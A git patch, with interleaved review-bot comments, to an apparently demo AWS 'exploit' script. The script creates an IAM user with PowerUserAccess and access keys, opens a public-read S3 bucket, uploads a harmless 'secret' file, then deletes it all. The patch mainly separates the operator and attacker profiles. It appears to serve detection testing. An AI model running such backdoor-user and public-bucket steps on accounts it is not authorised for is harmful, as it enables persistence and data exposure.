From 879a91aa0b36a0d41520b028e754eac24297b389 Mon Sep 17 00:00:00 2001
From: ipcrm
Date: Fri, 13 Oct 2023 09:09:39 -0400
Subject: [PATCH] fix(profile): use different profiles for attacker/created acccount and enable use of AWS_PROFILE
---
 util/scripts/lw_aws_exploit.sh | 34 ++++++++++++++++++++++------------
 1 file changed, 22 insertions(+), 12 deletions(-)
diff --git a/util/scripts/lw_aws_exploit.sh b/util/scripts/lw_aws_exploit.sh
index ead7a58..9ad2e0f 100755
--- a/util/scripts/lw_aws_exploit.sh
+++ b/util/scripts/lw_aws_exploit.sh
@@ -14,7 +14,16 @@ cyn=$'\e[1;36m'
 end=$'\e[0m'
 USERNAME=${1:-system}
-PROFILE=lacework
+PROFILE=${2:-$AWS_PROFILE}
+ATTACKER_PROFILE=attack
+
+if [ -z $PROFILE ]; then
+ echo "must pass profile as second argument or set AWS_PROFILE before execution"
+ exit 1
+fi
+
+# Disabling paging
+export AWS_PAGER=""
 # Create a new IAM user
 echo "${grn}Creating a new IAM user called ${mag}$USERNAME${end}"
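Review bot: The new guard `if [ -z $PROFILE ]; then` leaves `$PROFILE` unquoted, so a value containing whitespace makes `[` fail with a syntax error and the script carries on with a bad profile instead of stopping; it should read `if [ -z "$PROFILE" ]; then`, with the message sent to stderr via `>&2`. The hard-coded `ATTACKER_PROFILE=attack` also needs a check that it differs from `$PROFILE`, for example `[ "$PROFILE" != "$ATTACKER_PROFILE" ] || { echo "profile must differ from $ATTACKER_PROFILE" >&2; exit 1; }`. Without it, the `aws configure set` calls in the next hunk would overwrite the operator's own credentials with the temporary user's keys. The cleanup calls that use `--profile $PROFILE` would then run as that temporary user, which probably cannot remove its own IAM user and access key.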
@@ -23,43 +32,44 @@ aws iam create-user --user-name $USERNAME --profile $PROFILE | jq
 aws iam create-access-key --user-name $USERNAME --profile $PROFILE > creds.json
 echo ""
 echo "${grn}Granting PowerUser access to ${mag}$USERNAME${end}"
-aws iam attach-user-policy --user-name $USERNAME --profile $PROFILE --policy-arn arn:aws:iam::aws:policy/PowerUserAccess
+aws iam attach-user-policy --user-name $USERNAME --policy-arn arn:aws:iam::aws:policy/PowerUserAccess --profile $PROFILE
 export KEY=$(cat creds.json | jq -r .AccessKey.AccessKeyId)
 export SECRET=$(cat creds.json | jq -r .AccessKey.SecretAccessKey)
 # Here we start using the new account profile and creds
 echo ""
 echo "${grn}Creating a new S3 bucket and uploading a file...${end}"
-aws configure set aws_access_key_id "$KEY" --profile $PROFILE
-aws configure set aws_secret_access_key "$SECRET" --profile $PROFILE
+aws configure set aws_access_key_id "$KEY" --profile $ATTACKER_PROFILE
+aws configure set aws_secret_access_key "$SECRET" --profile $ATTACKER_PROFILE
+
 sleep 10
-bucket=$(aws s3api create-bucket --bucket dropbox-$RANDOM --region us-east-1 --object-ownership ObjectWriter --profile $PROFILE | jq -r .Location)
+bucket=$(aws s3api create-bucket --bucket dropbox-$RANDOM --region us-east-1 --object-ownership ObjectWriter --profile $ATTACKER_PROFILE | jq -r .Location)
 bucket=${bucket#/}
 aws s3api put-public-access-block \
+ --profile $ATTACKER_PROFILE \
 --bucket $bucket \
- --public-access-block-configuration "BlockPublicAcls=false,IgnorePublicAcls=false,BlockPublicPolicy=false,RestrictPublicBuckets=false" \
- --profile $PROFILE
+ --public-access-block-configuration "BlockPublicAcls=false,IgnorePublicAcls=false,BlockPublicPolicy=false,RestrictPublicBuckets=false"
-aws s3api put-bucket-acl --bucket $bucket --acl public-read --profile $PROFILE
+aws s3api put-bucket-acl --bucket $bucket --acl public-read --profile $ATTACKER_PROFILE
 curl -H "Accept: application/json" https://icanhazdadjoke.com/ > badfile.json
 echo ""
 echo "${grn}Uploading secret data...${end}"
-aws s3api put-object --acl public-read --bucket $bucket --key badfile.json --body badfile.json --profile $PROFILE
+aws s3api put-object --acl public-read --bucket $bucket --key badfile.json --body badfile.json --profile $ATTACKER_PROFILE
 sleep 10
 echo ""
 echo "${grn}Data uploaded. Preparing to destroy...${end}"
 sleep 10
 echo "${grn}Deleting file and S3 bucket...${end}"
-aws s3api delete-object --bucket $bucket --key badfile.json --profile $PROFILE
-aws s3api delete-bucket --bucket $bucket --profile $PROFILE
+aws s3api delete-object --bucket $bucket --key badfile.json --profile $ATTACKER_PROFILE
+aws s3api delete-bucket --bucket $bucket --profile $ATTACKER_PROFILE
 # Exit back out to our regular context
 echo "${grn}Cleaning up..."
-aws iam detach-user-policy --user-name $USERNAME --profile $PROFILE --policy-arn arn:aws:iam::aws:policy/PowerUserAccess
+aws iam detach-user-policy --user-name $USERNAME --policy-arn arn:aws:iam::aws:policy/PowerUserAccess --profile $PROFILE
 aws iam delete-access-key --access-key-id $KEY --user-name $USERNAME --profile $PROFILE
 aws iam delete-user --user-name $USERNAME --profile $PROFILE
 rm creds.json
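Review bot: The `attack` profile written by the two `aws configure set ... --profile $ATTACKER_PROFILE` lines is never cleared by the cleanup section. That section deletes the key and user in IAM and removes `creds.json`, but the key pair stays in the operator's shared AWS credentials file, and any profile already named `attack` is silently overwritten. After `rm creds.json` the script should blank the stored values, for example `aws configure set aws_access_key_id "" --profile "$ATTACKER_PROFILE"` and the same for `aws_secret_access_key`. A comment next to `ATTACKER_PROFILE` saying the profile is created and overwritten on every run would also help. The new `--profile $ATTACKER_PROFILE` and `--bucket $bucket` arguments are unquoted throughout this hunk; quoting them would match the already quoted `"$KEY"` and `"$SECRET"`.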